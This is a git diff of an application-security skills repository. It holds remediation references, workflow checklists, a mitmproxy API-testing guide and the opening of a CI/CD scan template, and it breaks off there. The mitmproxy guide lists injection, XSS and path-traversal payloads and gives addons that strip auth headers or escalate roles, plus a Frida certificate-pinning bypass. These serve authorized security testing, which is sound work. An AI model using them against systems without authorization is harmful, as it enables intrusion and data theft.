- **T1078**: Valid Accounts
#### Execution (TA0002)
- **T1059**: Command and Scripting Interpreter
- **T1203**: Exploitation for Client Execution
#### Persistence (TA0003)
- **T1098**: Account Manipulation
- **T1136**: Create Account
- **T1505**: Server Software Component
#### Privilege Escalation (TA0004)
- **T1068**: Exploitation for Privilege Escalation
- **T1548**: Abuse Elevation Control Mechanism
#### Defense Evasion (TA0005)
- **T1027**: Obfuscated Files or Information
- **T1140**: Deobfuscate/Decode Files or Information
- **T1562**: Impair Defenses
#### Credential Access (TA0006)
- **T1110**: Brute Force
- **T1555**: Credentials from Password Stores
- **T1552**: Unsecured Credentials
#### Discovery (TA0007)
- **T1083**: File and Directory Discovery
- **T1046**: Network Service Scanning
#### Collection (TA0009)
- **T1005**: Data from Local System
- **T1114**: Email Collection
#### Exfiltration (TA0010)
- **T1041**: Exfiltration Over C2 Channel
- **T1567**: Exfiltration Over Web Service
**Usage**: When identifying vulnerabilities, consider which ATT&CK techniques an attacker could use to exploit them.
---
## Remediation Patterns
This section provides specific remediation guidance for common vulnerability types.
### SQL Injection Remediation
**Step 1: Identify vulnerable queries**
- Search for string concatenation in SQL queries
- Check for f-strings or format() with SQL keywords
- Review all database interaction code
**Step 2: Apply parameterized queries**
```python
# Python with sqlite3
cursor.execute("SELECT * FROM users WHERE id = ?", (user_id,))
# Python with psycopg2 (PostgreSQL)
cursor.execute("SELECT * FROM users WHERE id = %s", (user_id,))
# Python with SQLAlchemy (ORM)
from sqlalchemy import text
result = session.execute(text("SELECT * FROM users WHERE id = :id"), {"id": user_id})
```
**Step 3: Validate and sanitize input** (defense in depth)
```python
import re
# Validate input format
if not re.match(r'^\d+$', user_id):
    raise ValueError("Invalid user ID format")
# Use ORM query builders
user = User.query.filter_by(id=user_id).first()
```
**Step 4: Implement least privilege**
- Database user should have minimum required permissions
- Use read-only accounts for SELECT operations
- Never use admin/root accounts for application queries
### XSS Remediation
**Step 1: Enable auto-escaping**
- Most modern frameworks escape by default
- Ensure auto-escaping is not disabled
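For example, in Python code that uses Jinja2 directly, autoescaping can be switched on explicitly (a minimal sketch; frameworks such as Flask already enable it for HTML templates):
```python
from jinja2 import Environment

# Force autoescaping on so {{ user_input }} is HTML-escaped in the rendered output.
# For file-based loaders, select_autoescape(["html", "xml"]) enables it per extension.
env = Environment(autoescape=True)
template = env.from_string("<p>{{ user_input }}</p>")
print(template.render(user_input="<script>alert(1)</script>"))
# -> <p>&lt;script&gt;alert(1)&lt;/script&gt;</p>
```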
**Step 2: Use framework-specific safe methods**
```javascript
// React: Use JSX (auto-escapes)
<div>{userInput}</div>
// Vue: Use template syntax (auto-escapes)
<div>{{ userInput }}</div>
// Angular: Use property binding (auto-escapes)
<div [textContent]="userInput"></div>
```
**Step 3: Sanitize when HTML is required**
```javascript
import DOMPurify from 'dompurify';
// Sanitize HTML content
const clean = DOMPurify.sanitize(userHTML, {
ALLOWED_TAGS: ['b', 'i', 'em', 'strong', 'p'],
ALLOWED_ATTR: []
});
```
**Step 4: Content Security Policy (CSP)**
Send a CSP response header (or the equivalent `<meta http-equiv="Content-Security-Policy">` tag):
```http
Content-Security-Policy: default-src 'self'; script-src 'self' 'nonce-{random}'
```
---
## Advanced Configuration
This section contains detailed configuration options and tuning parameters.
### Example: SAST Tool Configuration
```yaml
# Advanced security scanner configuration
scanner:
# Severity threshold
severity_threshold: MEDIUM
# Rule configuration
rules:
enabled:
- sql-injection
- xss
- hardcoded-secrets
disabled:
- informational-only
# False positive reduction
confidence_threshold: HIGH
exclude_patterns:
- "*/test/*"
- "*/tests/*"
- "*/node_modules/*"
- "*.test.js"
- "*.spec.ts"
# Performance tuning
max_file_size_kb: 2048
timeout_seconds: 300
parallel_jobs: 4
# Output configuration
output_format: json
include_code_snippets: true
max_snippet_lines: 10
```
---
## Examples and Code Samples
This section provides comprehensive code examples for various scenarios.
### Example 1: Secure API Authentication
```python
# Secure API key handling
import os
from functools import wraps
from flask import Flask, request, jsonify
app = Flask(__name__)
# Load API key from environment (never hardcode)
VALID_API_KEY = os.environ.get('API_KEY')
if not VALID_API_KEY:
    raise ValueError("API_KEY environment variable not set")

def require_api_key(f):
    @wraps(f)
    def decorated_function(*args, **kwargs):
        api_key = request.headers.get('X-API-Key')
        if not api_key:
            return jsonify({'error': 'API key required'}), 401
        # Constant-time comparison to prevent timing attacks
        import hmac
        if not hmac.compare_digest(api_key, VALID_API_KEY):
            return jsonify({'error': 'Invalid API key'}), 403
        return f(*args, **kwargs)
    return decorated_function

@app.route('/api/secure-endpoint')
@require_api_key
def secure_endpoint():
    return jsonify({'message': 'Access granted'})
```
### Example 2: Secure Password Hashing
```python
# Secure password storage with bcrypt
import bcrypt
def hash_password(password: str) -> str:
    """Hash a password using bcrypt."""
    # Generate salt and hash password
    salt = bcrypt.gensalt(rounds=12)  # Cost factor: 12 (industry standard)
    hashed = bcrypt.hashpw(password.encode('utf-8'), salt)
    return hashed.decode('utf-8')

def verify_password(password: str, hashed: str) -> bool:
    """Verify a password against a hash."""
    return bcrypt.checkpw(
        password.encode('utf-8'),
        hashed.encode('utf-8')
    )

# Usage
stored_hash = hash_password("user_password")
is_valid = verify_password("user_password", stored_hash)  # True
```
### Example 3: Secure File Upload
```python
# Secure file upload with validation
import os
import magic
from werkzeug.utils import secure_filename
ALLOWED_EXTENSIONS = {'pdf', 'png', 'jpg', 'jpeg'}
ALLOWED_MIME_TYPES = {
'application/pdf',
'image/png',
'image/jpeg'
}
MAX_FILE_SIZE = 5 * 1024 * 1024 # 5 MB
def is_allowed_file(filename: str, file_content: bytes) -> bool:
    """Validate file extension and MIME type."""
    # Check extension
    if '.' not in filename:
        return False
    ext = filename.rsplit('.', 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        return False
    # Check MIME type (prevent extension spoofing)
    mime = magic.from_buffer(file_content, mime=True)
    if mime not in ALLOWED_MIME_TYPES:
        return False
    return True

def handle_upload(file):
    """Securely handle file upload."""
    # Check file size
    file.seek(0, os.SEEK_END)
    size = file.tell()
    file.seek(0)
    if size > MAX_FILE_SIZE:
        raise ValueError("File too large")
    # Read content for validation
    content = file.read()
    file.seek(0)
    # Validate file type
    if not is_allowed_file(file.filename, content):
        raise ValueError("Invalid file type")
    # Sanitize filename
    filename = secure_filename(file.filename)
    # Generate unique filename to prevent overwrite attacks
    import uuid
    unique_filename = f"{uuid.uuid4()}_{filename}"
    # Save to secure location (outside web root)
    upload_path = os.path.join('/secure/uploads', unique_filename)
    file.save(upload_path)
    return unique_filename
```
---
## Best Practices for Reference Documents
1. **Start with "When to use"** - Help Claude know when to load this reference
2. **Include table of contents** - For documents >100 lines
3. **Use concrete examples** - Code samples with vulnerable and fixed versions
4. **Map to frameworks** - OWASP, CWE, MITRE ATT&CK for context
5. **Provide remediation** - Don't just identify issues, show how to fix them
6. **Organize logically** - Group related content, use clear headings
7. **Keep examples current** - Use modern patterns and current framework versions
8. **Be concise** - Even in references, challenge every sentence


@@ -0,0 +1,253 @@
# Workflow Checklist Template
This template demonstrates workflow patterns for security operations. Copy and adapt these checklists to your specific skill needs.
## Pattern 1: Sequential Workflow Checklist
Use this pattern for operations that must be completed in order, step-by-step.
### Security Assessment Workflow
Progress:
[ ] 1. Identify application entry points and attack surface
[ ] 2. Map authentication and authorization flows
[ ] 3. Identify data flows and sensitive data handling
[ ] 4. Review existing security controls
[ ] 5. Document findings with framework references (OWASP, CWE)
[ ] 6. Prioritize findings by severity (CVSS scores)
[ ] 7. Generate report with remediation recommendations
Work through each step systematically. Check off completed items.
---
## Pattern 2: Conditional Workflow
Use this pattern when the workflow branches based on findings or conditions.
### Vulnerability Remediation Workflow
1. Identify vulnerability type
- If SQL Injection → See [sql-injection-remediation.md](sql-injection-remediation.md)
- If XSS (Cross-Site Scripting) → See [xss-remediation.md](xss-remediation.md)
- If Authentication flaw → See [auth-remediation.md](auth-remediation.md)
- If Authorization flaw → See [authz-remediation.md](authz-remediation.md)
- If Cryptographic issue → See [crypto-remediation.md](crypto-remediation.md)
2. Assess severity using a CVSS calculator (see the priority helper sketch after this list)
- If CVSS >= 9.0 → Priority: Critical (immediate action)
- If CVSS 7.0-8.9 → Priority: High (action within 24h)
- If CVSS 4.0-6.9 → Priority: Medium (action within 1 week)
- If CVSS < 4.0 → Priority: Low (action within 30 days)
3. Apply appropriate remediation pattern
4. Validate fix with security testing
5. Document changes and update security documentation
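The severity triage in step 2 can be written as a small helper; a minimal sketch using the thresholds above:
```python
def priority_from_cvss(score: float) -> str:
    """Map a CVSS base score to a remediation priority (thresholds from step 2)."""
    if score >= 9.0:
        return "Critical - immediate action"
    if score >= 7.0:
        return "High - action within 24h"
    if score >= 4.0:
        return "Medium - action within 1 week"
    return "Low - action within 30 days"

assert priority_from_cvss(9.8).startswith("Critical")
```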
---
## Pattern 3: Iterative Workflow
Use this pattern for operations that repeat across multiple targets or items.
### Code Security Review Workflow
For each file in the review scope:
1. Identify security-sensitive operations (auth, data access, crypto, input handling)
2. Check against secure coding patterns for the language
3. Flag potential vulnerabilities with severity rating
4. Map findings to CWE and OWASP categories
5. Suggest specific remediation approaches
6. Document finding with code location and fix priority
Continue until all files in scope have been reviewed.
---
## Pattern 4: Feedback Loop Workflow
Use this pattern when validation and iteration are required.
### Secure Configuration Generation Workflow
1. Generate initial security configuration based on requirements
2. Run validation script: `./scripts/validate_config.py config.yaml`
3. Review validation output:
- Note all errors (must fix)
- Note all warnings (should fix)
- Note all info items (consider)
4. Fix identified issues in configuration
5. Repeat steps 2-4 until validation passes with zero errors
6. Review warnings and determine if they should be addressed
7. Apply configuration once validation is clean
**Validation Loop**: Run validator → Fix errors → Repeat until clean
---
## Pattern 5: Parallel Analysis Workflow
Use this pattern when multiple independent analyses can run concurrently.
### Comprehensive Security Scan Workflow
Run these scans in parallel:
**Static Analysis**:
[ ] 1a. Run SAST scan (Semgrep/Bandit)
[ ] 1b. Run dependency vulnerability scan (Safety/npm audit)
[ ] 1c. Run secrets detection (Gitleaks/TruffleHog)
[ ] 1d. Run license compliance check
**Dynamic Analysis**:
[ ] 2a. Run DAST scan (ZAP/Burp)
[ ] 2b. Run API security testing
[ ] 2c. Run authentication/authorization testing
**Infrastructure Analysis**:
[ ] 3a. Run infrastructure-as-code scan (Checkov/tfsec)
[ ] 3b. Run container image scan (Trivy/Grype)
[ ] 3c. Run configuration review
**Consolidation**:
[ ] 4. Aggregate all findings
[ ] 5. Deduplicate and correlate findings
[ ] 6. Prioritize by risk (CVSS + exploitability + business impact)
[ ] 7. Generate unified security report
---
## Pattern 6: Research and Documentation Workflow
Use this pattern for security research and documentation tasks.
### Threat Modeling Workflow
Research Progress:
[ ] 1. Identify system components and boundaries
[ ] 2. Map data flows between components
[ ] 3. Identify trust boundaries
[ ] 4. Enumerate assets (data, services, credentials)
[ ] 5. Apply STRIDE framework to each component:
- Spoofing threats
- Tampering threats
- Repudiation threats
- Information disclosure threats
- Denial of service threats
- Elevation of privilege threats
[ ] 6. Map threats to MITRE ATT&CK techniques
[ ] 7. Identify existing mitigations
[ ] 8. Document residual risks
[ ] 9. Recommend additional security controls
[ ] 10. Generate threat model document
Work through each step systematically. Check off completed items.
---
## Pattern 7: Compliance Validation Workflow
Use this pattern for compliance checks against security standards.
### Security Compliance Audit Workflow
**SOC 2 Controls Review**:
[ ] 1. Review access control policies (CC6.1, CC6.2, CC6.3)
[ ] 2. Verify logical access controls implementation (CC6.1)
[ ] 3. Review authentication mechanisms (CC6.1)
[ ] 4. Verify encryption implementation (CC6.1, CC6.7)
[ ] 5. Review audit logging configuration (CC7.2)
[ ] 6. Verify security monitoring (CC7.2, CC7.3)
[ ] 7. Review incident response procedures (CC7.3, CC7.4)
[ ] 8. Verify backup and recovery processes (A1.2, A1.3)
**Evidence Collection**:
[ ] 9. Collect policy documents
[ ] 10. Collect configuration screenshots
[ ] 11. Collect audit logs
[ ] 12. Document control gaps
[ ] 13. Generate compliance report
---
## Pattern 8: Incident Response Workflow
Use this pattern for security incident handling.
### Security Incident Response Workflow
**Detection and Analysis**:
[ ] 1. Confirm security incident (rule out false positive)
[ ] 2. Determine incident severity (SEV1/2/3/4)
[ ] 3. Identify affected systems and data
[ ] 4. Preserve evidence (logs, memory dumps, network captures)
**Containment**:
[ ] 5. Isolate affected systems (network segmentation)
[ ] 6. Disable compromised accounts
[ ] 7. Block malicious indicators (IPs, domains, hashes)
[ ] 8. Implement temporary compensating controls
**Eradication**:
[ ] 9. Identify root cause
[ ] 10. Remove malicious artifacts (malware, backdoors, webshells)
[ ] 11. Patch vulnerabilities exploited
[ ] 12. Reset compromised credentials
**Recovery**:
[ ] 13. Restore systems from clean backups (if needed)
[ ] 14. Re-enable systems with monitoring
[ ] 15. Verify system integrity
[ ] 16. Resume normal operations
**Post-Incident**:
[ ] 17. Document incident timeline
[ ] 18. Identify lessons learned
[ ] 19. Update security controls to prevent recurrence
[ ] 20. Update incident response procedures
[ ] 21. Communicate with stakeholders
---
## Usage Guidelines
### When to Use Workflow Checklists
**Use checklists for**:
- Complex multi-step operations
- Operations requiring specific order
- Security assessments and audits
- Incident response procedures
- Compliance validation tasks
**Don't use checklists for**:
- Simple single-step operations
- Highly dynamic exploratory work
- Operations that vary significantly each time
### Adapting This Template
1. **Copy relevant pattern** to your skill's SKILL.md or create new reference file
2. **Customize steps** to match your specific security tool or process
3. **Add framework references** (OWASP, CWE, NIST) where applicable
4. **Include tool-specific commands** for automation
5. **Add decision points** where manual judgment is required
### Checklist Best Practices
- **Be specific**: "Run semgrep --config=auto ." not "Scan the code"
- **Include success criteria**: "Validation passes with 0 errors"
- **Reference standards**: Link to OWASP, CWE, NIST where relevant
- **Show progress**: Checkbox format helps track completion
- **Provide escape hatches**: "If validation fails, see troubleshooting.md"
### Integration with Feedback Loops
Combine checklists with validation scripts for maximum effectiveness:
1. Create checklist for the workflow
2. Provide validation script that checks quality
3. Include "run validator" step in checklist
4. Loop: Complete step → Validate → Fix issues → Re-validate
This pattern dramatically improves output quality through systematic validation.
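A minimal sketch of that loop as a driver script (assumes the validator exits non-zero while errors remain; the `scripts/validate_config.py` path and the manual fix step are placeholders):
```python
#!/usr/bin/env python3
"""Illustrative validate-fix loop: re-run the validator until it passes or we give up."""
import subprocess
import sys

MAX_ITERATIONS = 5

def run_validator(config_path: str) -> int:
    result = subprocess.run(
        [sys.executable, "scripts/validate_config.py", config_path],
        capture_output=True, text=True,
    )
    print(result.stdout, end="")
    return result.returncode

for attempt in range(1, MAX_ITERATIONS + 1):
    if run_validator("config.yaml") == 0:
        print(f"Validation clean after {attempt} attempt(s)")
        break
    # Fix step is manual or tool-assisted; pause here for corrections
    input("Fix the reported issues, then press Enter to re-validate...")
else:
    sys.exit("Validation still failing after maximum attempts")
```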

skills/appsec/.category Normal file

@@ -0,0 +1,5 @@
# Application Security Skills
This directory contains skills for application security operations.
See the main [README.md](../../README.md) for usage and [CONTRIBUTE.md](../../CONTRIBUTE.md) for contribution guidelines.


@@ -0,0 +1,484 @@
---
name: api-mitmproxy
description: >
Interactive HTTPS proxy for API security testing with traffic interception, modification, and
replay capabilities. Supports HTTP/1, HTTP/2, HTTP/3, WebSockets, and TLS-protected protocols.
Includes Python scripting API for automation and multiple interfaces (console, web, CLI). Use when:
(1) Intercepting and analyzing API traffic for security testing, (2) Modifying HTTP/HTTPS requests
and responses to test API behavior, (3) Recording and replaying API traffic for testing, (4)
Debugging mobile app or thick client API communications, (5) Automating API security tests with
Python scripts, (6) Exporting traffic in HAR format for analysis.
version: 0.1.0
maintainer: SirAppSec
category: appsec
tags: [api-testing, proxy, https, intercepting-proxy, traffic-analysis, mitmproxy, har-export, websockets]
frameworks: [OWASP]
dependencies:
python: ">=3.9"
tools: [mitmproxy, mitmweb, mitmdump]
references:
- https://mitmproxy.org/
- https://docs.mitmproxy.org/
---
# mitmproxy API Security Testing
## Overview
mitmproxy is an interactive, TLS-capable intercepting HTTP proxy for penetration testers and developers. It enables real-time inspection, modification, and replay of HTTP/HTTPS traffic including APIs, mobile apps, and thick clients. With support for HTTP/1, HTTP/2, HTTP/3, and WebSockets, mitmproxy provides comprehensive coverage for modern API security testing.
## Interfaces
**mitmproxy** - Interactive console interface with keyboard navigation
**mitmweb** - Web-based GUI for visual traffic inspection
**mitmdump** - Command-line tool for automated traffic capture and scripting
## Quick Start
Install and run mitmproxy:
```bash
# Install via pip
pip install mitmproxy
# Start interactive console proxy
mitmproxy
# Start web interface (default: http://127.0.0.1:8081)
mitmweb
# Start command-line proxy with output
mitmdump -w traffic.flow
```
Configure client to use proxy (default: localhost:8080)
## Core Workflows
### Workflow 1: Interactive API Traffic Inspection
For manual API security testing and analysis:
1. Start mitmproxy or mitmweb:
```bash
# Console interface
mitmproxy --mode regular --listen-host 0.0.0.0 --listen-port 8080
# Or web interface
mitmweb --mode regular --listen-host 0.0.0.0 --listen-port 8080
```
2. Configure target application to use proxy (HTTP: localhost:8080)
3. Install mitmproxy CA certificate on client device
4. Trigger API requests from the application
5. Intercept and inspect requests/responses in mitmproxy
6. Modify requests to test:
- Authentication bypass attempts
- Authorization flaws (IDOR, privilege escalation)
- Input validation (SQLi, XSS, command injection)
- Business logic vulnerabilities
7. Save flows for documentation and reporting
### Workflow 2: Mobile App API Security Testing
Progress:
[ ] 1. Install mitmproxy CA certificate on mobile device
[ ] 2. Configure device WiFi to use mitmproxy as proxy
[ ] 3. Start mitmweb for visual traffic inspection
[ ] 4. Launch mobile app and exercise all features
[ ] 5. Review API endpoints, authentication mechanisms, data flows
[ ] 6. Test for common API vulnerabilities (OWASP API Top 10)
[ ] 7. Export traffic as HAR for further analysis
[ ] 8. Document findings with request/response examples
Work through each step systematically. Check off completed items.
### Workflow 3: Automated API Traffic Recording
For capturing and analyzing API traffic at scale:
1. Start mitmdump with flow capture:
```bash
mitmdump -w api-traffic.flow --mode regular
```
2. Run automated tests or manual app interaction
3. Stop mitmdump (Ctrl+C) to save flows
4. Replay captured traffic:
```bash
# Replay captured client requests against the server
mitmdump -n --client-replay api-traffic.flow
# Replay with modifications via script
mitmdump -s replay-script.py -r api-traffic.flow
```
5. Inspect captured flows with the Python API, or export HAR with the built-in addon (see Pattern 4):
```bash
# List captured request URLs
python3 -c "from mitmproxy.io import FlowReader; [print(f.request.url) for f in FlowReader(open('api-traffic.flow', 'rb')).stream()]"
```
### Workflow 4: Python Scripting for API Testing
For automated security testing with custom logic:
1. Create Python addon script (`api-test.py`):
```python
from mitmproxy import http
class APISecurityTester:
    def request(self, flow: http.HTTPFlow) -> None:
        # Modify requests on-the-fly
        if "api.example.com" in flow.request.pretty_url:
            # Test for authorization bypass
            flow.request.headers["X-User-ID"] = "1"

    def response(self, flow: http.HTTPFlow) -> None:
        # Analyze responses
        if flow.response.status_code == 200:
            if "admin" in flow.response.text:
                print(f"[!] Potential privilege escalation: {flow.request.url}")

addons = [APISecurityTester()]
```
2. Run mitmproxy with script:
```bash
mitmproxy -s api-test.py
# Or for automation
mitmdump -s api-test.py -w results.flow
```
3. Review automated findings and captured traffic
4. Export results for reporting
### Workflow 5: SSL/TLS Certificate Pinning Bypass
For testing mobile apps with certificate pinning:
1. Install mitmproxy CA certificate on device
2. Use certificate unpinning tools or framework modifications:
- Android: Frida script for SSL unpinning
- iOS: SSL Kill Switch or similar tools
3. Configure app traffic through mitmproxy
4. Alternatively, use reverse proxy mode:
```bash
mitmproxy --mode reverse:https://api.example.com --listen-host 0.0.0.0 --listen-port 443
```
5. Modify /etc/hosts to redirect API domain to mitmproxy
6. Intercept and analyze traffic normally
## Operating Modes
mitmproxy supports multiple deployment modes:
**Regular Proxy Mode** (default):
```bash
mitmproxy --mode regular --listen-port 8080
```
Client configures proxy settings explicitly.
**Transparent Proxy Mode** (invisible to client):
```bash
mitmproxy --mode transparent --listen-port 8080
```
Requires iptables/pf rules to redirect traffic.
**Reverse Proxy Mode** (sits in front of server):
```bash
mitmproxy --mode reverse:https://api.example.com --listen-port 443
```
mitmproxy acts as the server endpoint.
**Upstream Proxy Mode** (chain proxies):
```bash
mitmproxy --mode upstream:http://corporate-proxy:8080
```
Routes traffic through another proxy.
## Certificate Installation
Install mitmproxy CA certificate for HTTPS interception:
**Browser/Desktop:**
1. Start mitmproxy and configure proxy settings
2. Visit http://mitm.it
3. Download certificate for your platform
4. Install in system/browser certificate store
**Android:**
1. Push certificate to device: `adb push ~/.mitmproxy/mitmproxy-ca-cert.cer /sdcard/`
2. Settings → Security → Install from SD card
3. Select mitmproxy certificate
**iOS:**
1. Email certificate or host on web server
2. Install profile on device
3. Settings → General → About → Certificate Trust Settings
4. Enable trust for mitmproxy certificate
## Common Patterns
### Pattern 1: API Authentication Testing
Test authentication mechanisms and token handling:
```python
# auth-test.py
from mitmproxy import http
class AuthTester:
    def __init__(self):
        self.tokens = []

    def request(self, flow: http.HTTPFlow):
        # Capture auth tokens
        if "authorization" in flow.request.headers:
            token = flow.request.headers["authorization"]
            if token not in self.tokens:
                self.tokens.append(token)
                print(f"[+] Captured token: {token[:20]}...")
        # Test for missing authentication
        if "api.example.com" in flow.request.url:
            flow.request.headers.pop("authorization", None)
            print(f"[*] Testing unauthenticated: {flow.request.path}")

addons = [AuthTester()]
```
### Pattern 2: API Parameter Fuzzing
Fuzz API parameters for injection vulnerabilities:
```python
# fuzz-params.py
from mitmproxy import http
class ParamFuzzer:
    def request(self, flow: http.HTTPFlow):
        if flow.request.method == "POST" and "api.example.com" in flow.request.url:
            # Clone and modify request
            original_body = flow.request.text
            payloads = ["' OR '1'='1", "<script>alert(1)</script>", "../../../etc/passwd"]
            for payload in payloads:
                # Modify parameters and test
                # (Implementation depends on content-type)
                print(f"[*] Testing payload: {payload}")

addons = [ParamFuzzer()]
```
### Pattern 3: GraphQL API Testing
Inspect and test GraphQL APIs:
```python
# graphql-test.py
from mitmproxy import http
import json
class GraphQLTester:
    def request(self, flow: http.HTTPFlow):
        if "/graphql" in flow.request.path:
            try:
                data = json.loads(flow.request.text)
            except (TypeError, ValueError):
                return  # not a JSON body
            query = data.get("query", "")
            print(f"[+] GraphQL Query:\n{query}")
            # Test for introspection
            if "__schema" not in query:
                introspection = {"query": "{__schema{types{name}}}"}
                print(f"[*] Testing introspection payload: {introspection}")

addons = [GraphQLTester()]
```
### Pattern 4: HAR Export for Analysis
Export traffic as HTTP Archive for analysis:
```bash
# Export flows to HAR format with a custom addon
mitmdump -s export-har.py -r captured-traffic.flow
```
```python
# export-har.py
from mitmproxy import ctx

class HARExporter:
    def done(self):
        har_entries = []
        # Build HAR structure here
        # (Simplified - prefer mitmproxy's built-in HAR addon below)
        ctx.log.info(f"Exported {len(har_entries)} entries")

addons = [HARExporter()]
```
Or use built-in addon:
```bash
mitmdump --set hardump=./traffic.har
```
## Security Considerations
- **Sensitive Data Handling**: Captured traffic may contain credentials, tokens, PII. Encrypt and secure stored flows. Never commit flow files to version control
- **Access Control**: Restrict access to mitmproxy instance. Use authentication for mitmweb (--web-user/--web-password flags)
- **Audit Logging**: Log all intercepted traffic and modifications for security auditing and compliance
- **Compliance**: Ensure proper authorization before intercepting production traffic. Comply with GDPR, PCI-DSS for sensitive data
- **Safe Defaults**: Use isolated testing environments. Avoid intercepting production traffic without explicit authorization
## Integration Points
### Penetration Testing Workflow
1. Reconnaissance: Identify API endpoints via mitmproxy
2. Authentication testing: Capture and analyze auth tokens
3. Authorization testing: Modify user IDs, roles, permissions
4. Input validation: Inject payloads to test for vulnerabilities
5. Business logic: Test workflows for logical flaws
6. Export findings as HAR for reporting
### CI/CD Integration
Run automated API security tests:
```bash
# Run mitmdump with test script in CI
mitmdump -s api-security-tests.py --anticache -w test-results.flow &
PROXY_PID=$!
# Run API tests through proxy
export HTTP_PROXY=http://localhost:8080
export HTTPS_PROXY=http://localhost:8080
pytest tests/api_tests.py
# Stop proxy and analyze results
kill $PROXY_PID
python3 analyze-results.py test-results.flow
```
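The `analyze-results.py` step above is a placeholder. A minimal sketch of what it might do, assuming mitmproxy's flow file format and its `mitmproxy.io` reader API:
```python
# analyze-results.py - minimal sketch; flags error responses and requests sent without auth
import sys
from mitmproxy import io, http

def main(path: str) -> None:
    with open(path, "rb") as f:
        for flow in io.FlowReader(f).stream():
            if not isinstance(flow, http.HTTPFlow) or flow.response is None:
                continue
            if flow.response.status_code >= 400:
                print(f"[!] {flow.response.status_code} {flow.request.method} {flow.request.pretty_url}")
            if "authorization" not in flow.request.headers:
                print(f"[*] No auth header: {flow.request.method} {flow.request.pretty_url}")

if __name__ == "__main__":
    main(sys.argv[1])
```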
### Mobile App Security Testing
Standard workflow for iOS/Android apps:
1. Configure device to use mitmproxy
2. Install CA certificate
3. Bypass SSL pinning if needed
4. Exercise app functionality
5. Analyze API security (OWASP Mobile Top 10)
6. Document API vulnerabilities
## Advanced Features
### Traffic Filtering
Filter displayed traffic by expression:
```bash
# Show only API calls
mitmproxy --view-filter '~d api.example.com'
# Show only POST requests
mitmproxy --view-filter '~m POST'
# Show responses with specific status
mitmproxy --view-filter '~c 401'
# Combine filters
mitmproxy --view-filter '~d api.example.com & ~m POST'
```
### Request/Response Modification
Modify traffic using built-in mappers:
```bash
# Replace request headers
mitmproxy --modify-headers '/~u example/Authorization/Bearer fake-token'
# Replace response body
mitmproxy --modify-body '/~s & ~b "error"/success'
```
### WebSocket Interception
Intercept and modify WebSocket traffic:
```python
# websocket-test.py
from mitmproxy import http

class WebSocketTester:
    # In current mitmproxy releases, WebSocket messages arrive on the owning HTTP flow
    def websocket_message(self, flow: http.HTTPFlow):
        message = flow.websocket.messages[-1]
        print(f"[+] WebSocket: {message.content[:100]}")
        # Modify client-to-server messages in place
        if message.from_client:
            message.content = message.content.replace(b"user", b"admin")
addons = [WebSocketTester()]
```
## Troubleshooting
### Issue: SSL Certificate Errors
**Solution**: Ensure mitmproxy CA certificate is properly installed and trusted:
```bash
# Verify certificate location
ls ~/.mitmproxy/
# Regenerate certificates if needed
rm -rf ~/.mitmproxy/
mitmproxy # Regenerates on startup
```
### Issue: Mobile App Not Sending Traffic Through Proxy
**Solution**:
- Verify WiFi proxy configuration
- Check firewall rules aren't blocking proxy port
- Ensure mitmproxy is listening on correct interface (0.0.0.0)
- Test with a desktop browser first to verify the proxy works (see the curl check below)
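A quick way to rule out network-level problems before debugging the device itself (host and port are placeholders for your setup):
```bash
# From another machine on the same network, confirm the proxy answers and relays traffic
curl -x http://192.168.1.10:8080 -k https://example.com -o /dev/null -v
```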
### Issue: Certificate Pinning Blocking Interception
**Solution**: Use SSL unpinning tools:
```bash
# Android with Frida
frida -U -l universal-android-ssl-pinning-bypass.js -f com.example.app
# Or modify app to disable pinning (development builds)
```
### Issue: Cannot Intercept HTTP/2 or HTTP/3
**Solution**: mitmproxy supports HTTP/2 by default. For HTTP/3:
```bash
# Enable HTTP/3 support (experimental)
mitmproxy --set http3=true
```
## OWASP API Security Top 10 Testing
Use mitmproxy to test for the OWASP API Security Top 10 vulnerabilities (a sample API1 addon sketch follows the list):
- **API1: Broken Object Level Authorization** - Modify object IDs in requests
- **API2: Broken Authentication** - Test token validation, session management
- **API3: Broken Object Property Level Authorization** - Test for mass assignment
- **API4: Unrestricted Resource Consumption** - Test rate limiting, pagination
- **API5: Broken Function Level Authorization** - Modify roles, escalate privileges
- **API6: Unrestricted Access to Sensitive Business Flows** - Test business logic
- **API7: Server Side Request Forgery** - Inject URLs in parameters
- **API8: Security Misconfiguration** - Check headers, CORS, error messages
- **API9: Improper Inventory Management** - Enumerate undocumented endpoints
- **API10: Unsafe Consumption of APIs** - Test third-party API integrations
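As a concrete starting point for API1, the sketch below rewrites numeric object IDs in request paths and flags probes that still succeed. The host and probe ID are placeholders; run it only against accounts you control:
```python
# bola-probe.py - minimal sketch for API1 (Broken Object Level Authorization)
import re
from mitmproxy import http

PROBE_ID = "2"  # an object ID owned by a different test account

class BolaProbe:
    def request(self, flow: http.HTTPFlow):
        if "api.example.com" not in flow.request.pretty_host:
            return
        new_path = re.sub(r"/\d+(?=/|$)", f"/{PROBE_ID}", flow.request.path)
        if new_path != flow.request.path:
            print(f"[*] BOLA probe: {flow.request.path} -> {new_path}")
            flow.request.path = new_path

    def response(self, flow: http.HTTPFlow):
        # A 200 on a probed path means the swapped object was served to the wrong user
        if flow.response and flow.response.status_code == 200 and re.search(rf"/{PROBE_ID}(/|$)", flow.request.path):
            print(f"[!] Possible BOLA: {flow.request.method} {flow.request.path} returned 200")

addons = [BolaProbe()]
```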
## References
- [mitmproxy Documentation](https://docs.mitmproxy.org/)
- [mitmproxy GitHub](https://github.com/mitmproxy/mitmproxy)
- [OWASP API Security Top 10](https://owasp.org/www-project-api-security/)
- [mitmproxy Addon Examples](https://github.com/mitmproxy/mitmproxy/tree/main/examples)

View File

@@ -0,0 +1,9 @@
# Assets Directory
Place files that will be used in the output Claude produces:
- Templates
- Configuration files
- Images/logos
- Boilerplate code
These files are NOT loaded into context but copied/modified in output.

View File

@@ -0,0 +1,357 @@
# Security-Enhanced CI/CD Pipeline Template
#
# This template demonstrates security best practices for CI/CD pipelines.
# Adapt this template to your specific security tool and workflow needs.
#
# Key Security Features:
# - SAST (Static Application Security Testing)
# - Dependency vulnerability scanning
# - Secrets detection
# - Infrastructure-as-Code security scanning
# - Container image scanning
# - Security artifact uploading for compliance
name: Security Scan Pipeline
on:
push:
branches: [main, develop]
pull_request:
branches: [main, develop]
schedule:
# Run weekly security scans on Sunday at 2 AM UTC
- cron: '0 2 * * 0'
workflow_dispatch: # Allow manual trigger
# Security: Restrict permissions to minimum required
permissions:
contents: read
security-events: write # For uploading SARIF results
pull-requests: write # For commenting on PRs
env:
# Configuration
SECURITY_SCAN_FAIL_ON: 'critical,high' # Fail build on these severities
REPORT_DIR: 'security-reports'
jobs:
